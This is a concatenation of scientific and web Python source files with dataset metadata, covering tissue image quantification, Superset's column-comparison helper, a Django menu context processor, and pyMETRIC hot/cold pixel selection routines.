columns=[\"lacunar_space\"],\n )\n res[\"area\"] = [r.area for r in prj.rois]\n res[\"lacunar_fraction\"] = res[\"lacunar_space\"] / res[\"area\"]\n res.to_csv(f)\n res = pd.read_csv(f, index_col=0)\n\n return res\n\n\ndef score_marker(channel: str = \"ColTypeI(Tm169)\", overwrite: bool = False):\n f = output_dir / f\"extent_and_intensity.{channel}_quantification.csv\"\n\n if not f.exists() or overwrite:\n _res = parmap.map(get_extent_and_mean, prj.rois, marker=channel, pm_pbar=True)\n res = pd.DataFrame(\n _res, columns=[\"extent\", \"intensity\"], index=[r.name for r in prj.rois]\n )\n res[\"score\"] = res.apply(lambda x: (x - x.mean()) / x.std()).mean(1)\n res.to_csv(f)\n res = pd.read_csv(f, index_col=0)\n\n return res\n\n\n@close_plots\ndef interpret_metric(res: DataFrame, metric):\n\n # get mean per sample\n res_sample = (\n res.join(config.roi_attributes[\"sample\"])\n .groupby(\"sample\")\n .mean()\n .join(config.sample_attributes)\n )\n\n for attr in config.categorical_attributes:\n fig, stats = swarmboxenplot(\n data=res.join(config.roi_attributes),\n x=attr,\n y=res.columns,\n plot_kws=dict(palette=config.colors.get(attr)),\n )\n fig.savefig(\n output_dir / f\"{metric}.roi.by_{attr}.svg\",\n **config.figkws,\n )\n stats.to_csv(output_dir / f\"{metric}.roi.by_{attr}.csv\", index=False)\n\n fig, stats = swarmboxenplot(\n data=res_sample,\n x=attr,\n y=res.columns,\n plot_kws=dict(palette=config.colors.get(attr)),\n )\n fig.savefig(\n output_dir / f\"{metric}.sample.by_{attr}.svg\",\n **config.figkws,\n )\n stats.to_csv(output_dir / f\"{metric}.sample.by_{attr}.csv\", index=False)\n\n\ndef get_lacunae(\n roi: \"ROI\",\n selem_diam: int = 5,\n min_diam: int = 25,\n max_area_percentage: float = 50,\n fill_holes: bool = False,\n) -> Array:\n from csbdeep.utils import normalize\n import skimage as ski\n\n image = roi.stack[~roi.channel_exclude, ...]\n image = np.asarray([normalize(np.log1p(x)) for x in image]).mean(0)\n\n # threshold, close\n img = image > ski.filters.threshold_otsu(image)\n # img = image > ski.filters.threshold_multiotsu(image)[1]\n img = ski.morphology.binary_dilation(img, footprint=ski.morphology.disk(selem_diam))\n img = ski.morphology.closing(img, ski.morphology.disk(5))\n\n # clean up small objects inside\n if fill_holes:\n img = ~ndi.binary_fill_holes(~img)\n img = ~ski.morphology.remove_small_objects(~img, min_size=min_diam**2)\n\n lac = ndi.label(~img)[0]\n\n # remove objects too large\n remove = [\n i\n for i in np.unique(lac)\n if ((lac == i).sum() / img.size) * 100 > max_area_percentage\n ]\n if remove:\n for i in remove:\n lac[lac == i] = 0\n return lac\n fig, ax = plt.subplots()\n ax.imshow(image)\n ax.contour(lac, levels=3, cmap=\"Reds\")\n\n\ndef get_vessels(\n roi: \"ROI\",\n min_diam: int = 25,\n) -> Array:\n\n raise NotImplementedError\n\n from csbdeep.utils import normalize\n import skimage as ski\n\n image = roi._get_channel(\"AQ1\")[1]\n image = np.asarray([normalize(np.log1p(x)) for x in image]).mean(0)\n\n # threshold, close\n img = image > ski.filters.threshold_otsu(image)\n img = ski.morphology.remove_small_objects(img, min_size=min_diam**2)\n\n\ndef get_extent_and_mean(roi: \"ROI\", marker: str) -> tp.Tuple[float, float]:\n x = np.log1p(roi._get_channel(marker)[1].squeeze())\n area = np.multiply(*roi.shape[1:])\n mask = skimage.filters.gaussian(x, 2) > skimage.filters.threshold_otsu(x)\n return mask.sum() / area, x.mean()\n\n\nif __name__ == \"__main__\" and \"get_ipython\" not in locals():\n import sys\n\n try:\n sys.exit(main())\n except 
KeyboardInterrupt:\n sys.exit()\n", "repo_name": "ElementoLab/post-covid-imc", "sub_path": "src/pathology.py", "file_name": "pathology.py", "file_ext": "py", "file_size_in_byte": 6487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "src._config.config.results_dir", "line_number": 22, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 22, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 49, "usage_type": "call"}, {"api_name": "src._config.config.results_dir", "line_number": 50, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 50, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 55, "usage_type": "call"}, {"api_name": "src.analysis.get_domain_areas", "line_number": 72, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 77, "usage_type": "call"}, {"api_name": "parmap.map", "line_number": 91, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 91, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 91, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 92, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 94, "usage_type": "name"}, {"api_name": "src._config.prj.rois", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 97, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 100, "usage_type": "call"}, {"api_name": "parmap.map", "line_number": 109, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 109, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 109, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "src._config.prj.rois", "line_number": 111, "usage_type": "attribute"}, {"api_name": "src._config.prj", "line_number": 111, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 115, "usage_type": "call"}, {"api_name": "imc.types.DataFrame", "line_number": 121, "usage_type": "name"}, {"api_name": "src._config.config.roi_attributes", "line_number": 125, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 125, "usage_type": "name"}, {"api_name": "src._config.config.sample_attributes", "line_number": 128, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 128, "usage_type": "name"}, {"api_name": "src._config.config.categorical_attributes", "line_number": 131, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 131, "usage_type": "name"}, {"api_name": "src._config.config.roi_attributes", "line_number": 133, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 133, "usage_type": "name"}, {"api_name": "src._config.config.colors.get", "line_number": 136, "usage_type": "call"}, {"api_name": "src._config.config.colors", "line_number": 136, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 136, "usage_type": "name"}, {"api_name": "src._config.config.figkws", "line_number": 140, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 140, "usage_type": "name"}, {"api_name": "src._config.config.colors.get", "line_number": 148, "usage_type": "call"}, {"api_name": "src._config.config.colors", "line_number": 
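get_extent_and_mean in the pathology script above scores a channel as the fraction of pixels whose Gaussian-smoothed intensity clears an Otsu threshold, plus the mean log intensity. Here it is exercised end-to-end on synthetic data; the gamma-noise image and the bright square are assumptions made for the demo:

```python
import numpy as np
import skimage.filters

def extent_and_mean(img):
    x = np.log1p(img)                                   # compress dynamic range
    smooth = skimage.filters.gaussian(x, 2)
    mask = smooth > skimage.filters.threshold_otsu(x)   # bright "stained" pixels
    return mask.sum() / x.size, x.mean()

rng = np.random.default_rng(0)
img = rng.gamma(2.0, 1.0, size=(128, 128))
img[32:64, 32:64] += 20.0            # plant one bright square
extent, mean = extent_and_mean(img)
print("extent=%.3f mean=%.3f" % (extent, mean))  # extent ~= 0.0625 (the square)
```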
148, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 148, "usage_type": "name"}, {"api_name": "src._config.config.figkws", "line_number": 152, "usage_type": "attribute"}, {"api_name": "src._config.config", "line_number": 152, "usage_type": "name"}, {"api_name": "imc.graphics.close_plots", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "csbdeep.utils.normalize", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.log1p", "line_number": 168, "usage_type": "call"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 171, "usage_type": "call"}, {"api_name": "skimage.filters", "line_number": 171, "usage_type": "attribute"}, {"api_name": "skimage.morphology.binary_dilation", "line_number": 173, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 173, "usage_type": "attribute"}, {"api_name": "skimage.morphology.disk", "line_number": 173, "usage_type": "call"}, {"api_name": "skimage.morphology.closing", "line_number": 174, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 174, "usage_type": "attribute"}, {"api_name": "skimage.morphology.disk", "line_number": 174, "usage_type": "call"}, {"api_name": "skimage.morphology.remove_small_objects", "line_number": 179, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "imc.types.Array", "line_number": 163, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}, {"api_name": "csbdeep.utils.normalize", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.log1p", "line_number": 209, "usage_type": "call"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 212, "usage_type": "call"}, {"api_name": "skimage.filters", "line_number": 212, "usage_type": "attribute"}, {"api_name": "skimage.morphology.remove_small_objects", "line_number": 213, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 213, "usage_type": "attribute"}, {"api_name": "imc.types.Array", "line_number": 201, "usage_type": "name"}, {"api_name": "numpy.log1p", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 218, "usage_type": "call"}, {"api_name": "skimage.filters.gaussian", "line_number": 219, "usage_type": "call"}, {"api_name": "skimage.filters", "line_number": 219, "usage_type": "attribute"}, {"api_name": "skimage.filters.threshold_otsu", "line_number": 219, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 216, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 227, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 229, "usage_type": "call"}]} +{"seq_id": "25168136555", "text": "from typing import Optional\n\nimport pandas as pd\nfrom flask_babel import gettext as _\nfrom pandas import DataFrame\n\nfrom superset.constants import PandasPostprocessingCompare\nfrom superset.exceptions import InvalidPostProcessingError\nfrom superset.utils.core import TIME_COMPARISON\nfrom superset.utils.pandas_postprocessing.utils import validate_column_args\n\n\n@validate_column_args(\"source_columns\", \"compare_columns\")\ndef compare( # pylint: disable=too-many-arguments\n 
df: DataFrame,\n source_columns: list[str],\n compare_columns: list[str],\n compare_type: PandasPostprocessingCompare,\n drop_original_columns: Optional[bool] = False,\n precision: Optional[int] = 4,\n) -> DataFrame:\n \"\"\"\n Calculate column-by-column changing for select columns.\n\n :param df: DataFrame on which the compare will be based.\n :param source_columns: Main query columns\n :param compare_columns: Columns being compared\n :param compare_type: Type of compare. Choice of `absolute`, `percentage` or `ratio`\n :param drop_original_columns: Whether to remove the source columns and\n compare columns.\n :param precision: Round a change rate to a variable number of decimal places.\n :return: DataFrame with compared columns.\n :raises InvalidPostProcessingError: If the request in incorrect.\n \"\"\"\n if len(source_columns) != len(compare_columns):\n raise InvalidPostProcessingError(\n _(\"`compare_columns` must have the same length as `source_columns`.\")\n )\n if compare_type not in tuple(PandasPostprocessingCompare):\n raise InvalidPostProcessingError(\n _(\"`compare_type` must be `difference`, `percentage` or `ratio`\")\n )\n if len(source_columns) == 0:\n return df\n\n for s_col, c_col in zip(source_columns, compare_columns):\n s_df = df.loc[:, [s_col]]\n s_df.rename(columns={s_col: \"__intermediate\"}, inplace=True)\n c_df = df.loc[:, [c_col]]\n c_df.rename(columns={c_col: \"__intermediate\"}, inplace=True)\n if compare_type == PandasPostprocessingCompare.DIFF:\n diff_df = s_df - c_df\n elif compare_type == PandasPostprocessingCompare.PCT:\n diff_df = ((s_df - c_df) / c_df).astype(float).round(precision)\n else:\n # compare_type == \"ratio\"\n diff_df = (s_df / c_df).astype(float).round(precision)\n\n diff_df.rename(\n columns={\n \"__intermediate\": TIME_COMPARISON.join([compare_type, s_col, c_col])\n },\n inplace=True,\n )\n df = pd.concat([df, diff_df], axis=1)\n\n if drop_original_columns:\n df = df.drop(source_columns + compare_columns, axis=1)\n return df\n", "repo_name": "apache/superset", "sub_path": "superset/utils/pandas_postprocessing/compare.py", "file_name": "compare.py", "file_ext": "py", "file_size_in_byte": 2711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 55269, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.DataFrame", "line_number": 15, "usage_type": "name"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "superset.exceptions.InvalidPostProcessingError", "line_number": 36, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 37, "usage_type": "call"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 39, "usage_type": "argument"}, {"api_name": "superset.exceptions.InvalidPostProcessingError", "line_number": 40, "usage_type": "call"}, {"api_name": "flask_babel.gettext", "line_number": 41, "usage_type": "call"}, {"api_name": "superset.constants.PandasPostprocessingCompare.DIFF", "line_number": 51, "usage_type": "attribute"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 51, "usage_type": "name"}, {"api_name": "superset.constants.PandasPostprocessingCompare.PCT", "line_number": 53, "usage_type": "attribute"}, {"api_name": "superset.constants.PandasPostprocessingCompare", "line_number": 53, "usage_type": "name"}, {"api_name": 
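The compare() helper above reduces to three column-by-column formulas. The arithmetic in isolation, with made-up column names and a double-underscore separator standing in for the real TIME_COMPARISON join string:

```python
import pandas as pd

df = pd.DataFrame({"sales": [100.0, 250.0], "sales_prev": [80.0, 250.0]})
s, c = df["sales"], df["sales_prev"]

df["difference__sales__sales_prev"] = s - c                    # absolute change
df["percentage__sales__sales_prev"] = ((s - c) / c).round(4)   # relative change
df["ratio__sales__sales_prev"] = (s / c).round(4)

print(df.iloc[0].to_dict())
# {'sales': 100.0, 'sales_prev': 80.0, 'difference__...': 20.0,
#  'percentage__...': 0.25, 'ratio__...': 1.25}
```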
"superset.utils.core.TIME_COMPARISON.join", "line_number": 61, "usage_type": "call"}, {"api_name": "superset.utils.core.TIME_COMPARISON", "line_number": 61, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 65, "usage_type": "call"}, {"api_name": "superset.utils.pandas_postprocessing.utils.validate_column_args", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "38022710427", "text": "from django.urls import reverse\n\n\ndef menu(request):\n kwargs = {\n \"main_part_of_menu\": {\n \"title\": \"Джуманджи\",\n \"link\": \"/\"\n },\n \"parts_of_menu\": [\n {\n \"title\": \"Вакансии\",\n \"link\": reverse(\"vacancy_list\")\n },\n {\n \"title\": \"Компании\",\n \"link\": \"#\",\n },\n {\n \"title\": \"О проекте\",\n \"link\": \"#\"\n }\n ]\n }\n return kwargs\n\n\ndef navbar_username(request):\n if request.user.is_authenticated:\n username = request.user.username\n return {'username': username}\n return {'username': False}\n", "repo_name": "MVjimbo/djumandji", "sub_path": "app_catalog/context_processors.py", "file_name": "context_processors.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.reverse", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "9878378300", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 28 18:56:06 2018\n\n@author: hector\n\"\"\"\n\n# import pyTVDI\nimport numpy as np\nfrom scipy.signal import convolve2d\n\nVI_SOIL = 0.0\nVI_FULL = 0.95\n \ndef maxmin_temperature(vi_array, lst_array, vi_lower_limit=None):\n lst_nan = np.isnan(lst_array)\n vi_nan = np.isnan(vi_array)\n if np.all(lst_nan) or np.all(vi_nan):\n print('No valid LST or VI pixels')\n return None, None\n\n if isinstance(vi_lower_limit, type(None)):\n vi_lower_limit = np.nanpercentile(vi_array, 0.05)\n\n #cold pixel\n lst = np.nanmin(lst_array[vi_array >= vi_lower_limit])\n cold_pixel = tuple(np.argwhere(lst_array == lst)[0])\n print('Cold pixel found with %s K and %s VI'%(float(lst_array[cold_pixel]),\n float(vi_array[cold_pixel])))\n #hot pixel\n lst = np.nanmax(lst_array[vi_array <= vi_lower_limit])\n hot_pixel = tuple(np.argwhere(lst_array == lst)[0])\n print('Hot pixel found with %s K and %s VI'%(float(lst_array[hot_pixel]),\n float(vi_array[hot_pixel])))\n \n return cold_pixel, hot_pixel\n\n\ndef cimec(vi_array,\n lst_array,\n albedo_array,\n sza_array,\n cv_ndvi,\n cv_lst,\n adjust_rainfall=False):\n ''' Finds the hot and cold pixel using the \n Calibration using Inverse Modelling at Extreme Conditios\n \n Parameters\n ----------\n ndvi_array : numpy array\n NDVI array (-)\n lst_array : numpy array\n Land Surface Temperature array (Kelvin)\n albedo : numpy array\n surface albedo\n sza : numpy array\n solar zenith angle (degrees)\n cv_lst : numpy array\n Coefficient of variation of LST as homogeneity measurement\n from neighboring pixels\n adjust_rainfall : None or tuple\n if tuple (rainfall_60, ETr_60) indicates that hot temperature\n will be adjusted based on previous 60 day cummulated rainfall and ET\n Returns\n -------\n cold_pixel : int or tuple\n \n hot_pixel : int or tuple\n \n References\n ----------\n .. [Allen2017] Allen, Richard G., Boyd Burnett, William Kramber, Justin Huntington, \n Jeppe Kjaersgaard, Ayse Kilic, Carlos Kelly, and Ricardo Trezza, 2013. \n Automated Calibration of the METRIC Landsat Evapotranspiration Process. 
\n Journal of the American Water Resources Association (JAWRA) .49(3):563–576\n https://doi.org/10.1111/jawr.12056\n '''\n lst_nan = np.isnan(lst_array)\n vi_nan = np.isnan(vi_array)\n if np.all(lst_nan) or np.all(vi_nan):\n print('No valid LST or VI pixels')\n return None, None\n\n#==============================================================================\n# # Cold pixel\n#==============================================================================\n # Step 1. Find the 5% top NDVI pixels\n ndvi_top = np.nanpercentile(vi_array, 95)\n ndvi_index = vi_array >= ndvi_top\n\n # Step 2. Identify the coldest 20% LST pixels from ndvi_index and compute their LST and NDVI mean value\n lst_low = np.nanpercentile(lst_array[ndvi_index], 20)\n lst_index = lst_array <= lst_low\n lst_cold = np.mean(lst_array[lst_index])\n \n # Step 3. Cold pixel candidates are within 0.2K from lst_cold \n #and albedo within 0.02% of albedo_thres\n beta = (90.0 - sza_array) # Solar elevation angle\n albedo_thres = 0.001343 * beta + 0.3281 * np.exp(-0.0188 * beta) # Eq. 7 in [Allen2017]_\n cold_pixel = np.logical_and.reduce((lst_index, \n np.abs(lst_array - lst_cold) <= 0.2, \n np.abs(albedo_array - albedo_thres) <= 0.02))\n \n # Step 5. From step 3 select the most homogeneous pixel based on its temperature\n cold_pixel = np.logical_and(cold_pixel,\n cv_lst == np.nanmin(cv_lst[cold_pixel]))\n \n cold_pixel = tuple(np.argwhere(cold_pixel)[0])\n print('Cold pixel found with %s K and %s VI'%(float(lst_array[cold_pixel]),\n float(vi_array[cold_pixel])))\n\n#==============================================================================\n# # Cold pixel\n#==============================================================================\n # Step 1. Find the 10% lowest NDVI \n ndvi_low = np.nanpercentile(vi_array, 10)\n ndvi_index = vi_array <= ndvi_low\n \n # Step 2. Identify the hotest 20% LST pixels from ndvi_index and compute their LST and NDVI mean value\n lst_high = np.nanpercentile(lst_array[ndvi_index], 80)\n lst_index = lst_array >= lst_high\n lst_hot = np.mean(lst_array[lst_index])\n \n if not isinstance(adjust_rainfall, bool):\n # Step 3. Adjust the average temperature based on 60 day rainfall and ETr\n lst_hot -= 2.6 - 13.0 * adjust_rainfall[0]/adjust_rainfall[1] # Eq. 8 in [Allen2017]..\n \n # Step 4. Hot pixel candidates are within 0.2K from lst_hot and has homogeneous NDVI\n hot_pixel = np.logical_and(lst_index, \n np.abs(lst_array - lst_hot) <= 0.2)\n \n hot_pixel = np.logical_and(hot_pixel,\n cv_ndvi == np.nanmin(cv_ndvi[hot_pixel]))\n\n hot_pixel = tuple(np.argwhere(hot_pixel)[0])\n print('Hot pixel found with %s K and %s VI'%(float(lst_array[hot_pixel]),\n float(vi_array[hot_pixel])))\n \n return cold_pixel, hot_pixel\n\n\ndef esa(vi_array,\n lst_array,\n cv_vi,\n std_lst,\n cv_albedo):\n ''' Finds the hot and cold pixel using the \n Exhaustive Search Algorithm\n \n Parameters\n ----------\n vi_array : numpy array\n Vegetation Index array (-)\n lst_array : numpy array\n Land Surface Temperature array (Kelvin)\n cv_ndvi : numpy array\n Coefficient of variation of Vegetation Index as homogeneity measurement\n from neighboring pixels\n std_lst : numpy array\n Standard deviation of LST as homogeneity measurement\n from neighboring pixels\n cv_albedo : numpy array\n Coefficient of variation of albdeo as homogeneity measurement\n from neighboring pixels\n\n Returns\n -------\n cold_pixel : int or tuple\n \n hot_pixel : int or tuple\n\n ETrF_cold : float \n \n ETrF_hot : float\n \n References\n ----------\n .. 
[Bhattarai2017] Nishan Bhattarai, Lindi J. Quackenbush, Jungho Im, \n Stephen B. Shaw, 2017.\n A new optimized algorithm for automating endmember pixel selection \n in the SEBAL and METRIC models.\n Remote Sensing of Environment, Volume 196, Pages 178-192,\n https://doi.org/10.1016/j.rse.2017.05.009.\n '''\n \n lst_nan = np.isnan(lst_array)\n vi_nan = np.isnan(vi_array)\n if np.all(lst_nan) or np.all(vi_nan):\n print('No valid LST or VI pixels')\n return None, None\n\n # Step 1. Find homogeneous pixels\n print('Filtering pixels by homgeneity')\n homogeneous = np.logical_and.reduce((cv_vi <= 0.25,\n cv_albedo <= 0.25,\n std_lst < 1.5))\n \n print('Found %s homogeneous pixels'%np.sum(homogeneous))\n if np.sum(homogeneous) == 0:\n return None, None\n \n # Step 2 Filter outliers by Building ndvi and lst histograms\n lst_min, lst_max, vi_min, vi_max = histogram_fiter(vi_array[~vi_nan],\n lst_array[~lst_nan]) \n\n print('Removing outliers by histogram')\n mask = np.logical_and.reduce((homogeneous,\n lst_array >= lst_min,\n lst_array <= lst_max,\n vi_array >= vi_min,\n vi_array <= vi_max))\n \n print('Keep %s pixels after outlier removal'%np.sum(mask))\n if np.sum(mask) == 0:\n return None, None\n\n # Step 3. Interative search of cold pixel\n print('Iterative search of candidate cold pixels')\n cold_pixels = incremental_search(vi_array, lst_array, mask, is_cold = True)\n print('Found %s candidate cold pixels'%np.sum(cold_pixels))\n if np.sum(cold_pixels) == 0:\n return None, None\n\n\n print('Iterative search of candidate hot pixels')\n hot_pixels = incremental_search(vi_array, lst_array, mask, is_cold = False) \n print('Found %s candidate hot pixels'%np.sum(hot_pixels))\n if np.sum(hot_pixels) == 0:\n return None, None\n\n\n # Step 4. Rank the pixel candidates\n print('Ranking candidate anchor pixels')\n lst_rank = rank_array(lst_array)\n vi_rank = rank_array(vi_array)\n rank = vi_rank - lst_rank\n cold_pixel = np.logical_and(cold_pixels, rank == np.max(rank[cold_pixels]))\n\n cold_pixel = tuple(np.argwhere(cold_pixel)[0])\n print('Cold pixel found with %s K and %s VI'%(float(lst_array[cold_pixel]), \n float(vi_array[cold_pixel])))\n \n \n rank = lst_rank - vi_rank\n hot_pixel = np.logical_and(hot_pixels, rank == np.max(rank[hot_pixels]))\n\n hot_pixel = tuple(np.argwhere(hot_pixel)[0])\n print('Hot pixel found with %s K and %s VI'%(float(lst_array[hot_pixel]), \n float(vi_array[hot_pixel])))\n \n return cold_pixel, hot_pixel\n\n\ndef histogram_fiter(vi_array, lst_array):\n cold_bin_pixels = 0\n hot_bin_pixels = 0\n bare_bin_pixels = 0\n full_bin_pixels = 0\n \n while (cold_bin_pixels < 50 \n or hot_bin_pixels <50 \n or bare_bin_pixels < 50\n or full_bin_pixels < 50):\n\n max_lst = np.amax(lst_array)\n min_lst = np.amin(lst_array)\n max_vi = np.amax(vi_array)\n min_vi = np.amin(vi_array)\n \n print('Setting LST boundaries %s - %s'%(min_lst, max_lst))\n n_bins = int(np.ceil((max_lst - min_lst) / 0.25))\n lst_hist, lst_edges = np.histogram(lst_array, n_bins)\n \n print('Setting VI boundaries %s - %s'%(min_vi, max_vi))\n n_bins = int(np.ceil((max_vi - min_vi) / 0.01))\n vi_hist, vi_edges = np.histogram(vi_array, n_bins)\n\n # Get number of elements in the minimum and maximum bin\n cold_bin_pixels = lst_hist[0]\n hot_bin_pixels = lst_hist[-1]\n bare_bin_pixels = vi_hist[0]\n full_bin_pixels = vi_hist[-1]\n\n # Remove possible outliers\n if cold_bin_pixels < 50:\n lst_array = lst_array[lst_array >= lst_edges[1]] \n\n if hot_bin_pixels < 50:\n lst_array = lst_array[lst_array <= lst_edges[-2]] \n\n if 
bare_bin_pixels < 50:\n vi_array = vi_array[vi_array >= vi_edges[1]] \n\n if full_bin_pixels < 50:\n vi_array = vi_array[vi_array <= vi_edges[-2]] \n\n return lst_edges[0], lst_edges[-1], vi_edges[0], vi_edges[-1]\n\ndef rank_array(array):\n \n temp = array.argsort(axis = None) \n ranks = np.arange(np.size(array))[temp.argsort()].reshape(array.shape)\n \n return ranks\n \ndef incremental_search(vi_array, lst_array, mask, is_cold = True):\n step = 0\n if is_cold:\n while True:\n \n for n_lst in range(1, 11 + step):\n for n_vi in range(1, 11 + step):\n print('Searching cold pixels from the %s %% minimum LST and %s %% maximum VI'%(n_lst, n_vi))\n vi_high = np.nanpercentile(vi_array[mask], 100 - n_vi)\n lst_cold = np.nanpercentile(lst_array[mask], n_lst)\n cold_index = np.logical_and.reduce((mask,\n vi_array >= vi_high,\n lst_array <= lst_cold))\n \n if np.sum(cold_index) >= 10:\n return cold_index\n \n # If we reach here is because not enought pixels were found\n # Incresa the range of percentiles\n step += 5\n if step > 90:\n return []\n else:\n while True:\n for n_lst in range(1,11 + step):\n for n_vi in range(1,11 + step):\n print('Searching hot pixels from the %s %% maximum LST and %s %% minimum VI'%(n_lst, n_vi))\n vi_low = np.nanpercentile(vi_array[mask], n_vi)\n lst_hot = np.nanpercentile(lst_array[mask], 100 - n_lst)\n hot_index = np.logical_and.reduce((mask,\n vi_array <= vi_low,\n lst_array >= lst_hot))\n \n if np.sum(hot_index) >= 10:\n return hot_index\n # If we reach here is because not enought pixels were found\n # Incresa the range of percentiles\n step += 5\n if step > 90:\n return []\n\ndef moving_cv_filter(data, window):\n \n ''' window is a 2 element tuple with the moving window dimensions (rows, columns)'''\n kernel = np.ones(window)/np.prod(np.asarray(window))\n mean = convolve2d(data, kernel, mode = 'same', boundary = 'symm')\n \n distance = (data - mean)**2\n \n std = np.sqrt(convolve2d(distance, kernel, mode = 'same', boundary = 'symm'))\n \n cv = std/mean\n \n return cv, mean, std\n\n", "repo_name": "hectornieto/pyMETRIC", "sub_path": "pyMETRIC/endmember_search.py", "file_name": "endmember_search.py", "file_ext": "py", "file_size_in_byte": 13488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.isnan", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.logical_and.reduce", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 101, "usage_type": 
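moving_cv_filter at the end of the endmember module computes a windowed coefficient of variation with two box-filter convolutions. The same computation run on synthetic land-surface-temperature data; the 290 K homogeneous field is an assumption made for the demo:

```python
import numpy as np
from scipy.signal import convolve2d

def moving_cv(data, window=(3, 3)):
    kernel = np.ones(window) / np.prod(window)              # box filter
    mean = convolve2d(data, kernel, mode="same", boundary="symm")
    var = convolve2d((data - mean) ** 2, kernel, mode="same", boundary="symm")
    return np.sqrt(var) / mean                              # CV = std / mean

lst = 290.0 + np.random.default_rng(1).normal(0.0, 1.5, (64, 64))
cv = moving_cv(lst)
print(round(float(cv.mean()), 5))   # tiny: the field is homogeneous by design
```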
